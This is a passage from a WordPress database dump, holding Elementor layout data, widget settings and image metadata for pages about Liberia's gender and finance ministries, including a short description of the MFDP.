:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27582,4004,'_wp_attached_file','2019/11/gender-.png'),(27583,4004,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:289;s:6:\"height\";i:306;s:4:\"file\";s:19:\"2019/11/gender-.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"gender--283x300.png\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"gender--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"gender--289x265.png\";s:5:\"width\";i:289;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:18:\"gender--150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:19:\"gender--230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27584,4005,'_elementor_edit_mode','builder'),(27585,4005,'_elementor_template_type','wp-post'),(27586,4005,'_elementor_version','2.7.5'),(27587,4005,'_wp_page_template','default'),(27588,4005,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The MODCSP information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a4db5a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"38bc81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"17482a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ae03a19\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mogcsp\\\",\\\"tag_id\\\":\\\"64\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mogcsp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7758e3b1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"766d660a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a4a49d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a94bfb8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mogcsp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27589,4005,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27590,4005,'_thumbnail_id','3210'),(27591,1584,'internet','https://mogcsp.gov.lr/'),(27592,1584,'_pods_institution_logo','a:1:{i:0;i:4004;}'),(27596,4007,'_elementor_edit_mode','builder'),(27597,4007,'_elementor_template_type','wp-post'),(27598,4007,'_elementor_version','2.7.5'),(27599,4007,'_wp_page_template','default'),(27600,4007,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.<\\/p><p>As custodian of the country\\u2019s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mfdp\\\",\\\"tag_id\\\":\\\"188\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mfdp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mfdp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27601,4007,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27603,2704,'internet','https://www.mfdp.gov.lr/'),(27604,2704,'_pods_institution_logo','a:1:{i:0;i:2711;}'),(27609,2596,'_wp_old_date','2021-08-16'),(27615,4010,'_wp_attached_file','2021/08/J.S.Datuama-Cammue.png'),(27616,4010,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1095;s:6:\"height\";i:818;s:4:\"file\";s:30:\"2021/08/J.S.Datuama-Cammue.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"J.S.Datuama-Cammue-1024x765.png\";s:5:\"width\";i:1024;s:6:\"height\";i:765;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-768x574.png\";s:5:\"width\";i:768;s:6:\"height\";i:574;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:29:\"J.S.Datuama-Cammue-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:31:\"J.S.Datuama-Cammue-1095x650.png\";s:5:\"width\";i:1095;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-600x448.png\";s:5:\"width\";i:600;s:6:\"height\";i:448;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:30:\"J.S.Datuama-Cammue-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:31:\"J.S.Datuama-Cammue-1095x640.png\";s:5:\"width\";i:1095;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27617,4011,'_wp_attached_file','2021/08/CBD-LIBERIA-map.pdf'),(27633,4014,'_wp_attached_file','2021/08/Climate-Change.png'),(27634,4014,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:518;s:6:\"height\";i:665;s:4:\"file\";s:26:\"2021/08/Climate-Change.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Climate-Change-234x300.png\";s:5:\"width\";i:234;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Climate-Change-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Climate-Change-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:25:\"Climate-Change-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-t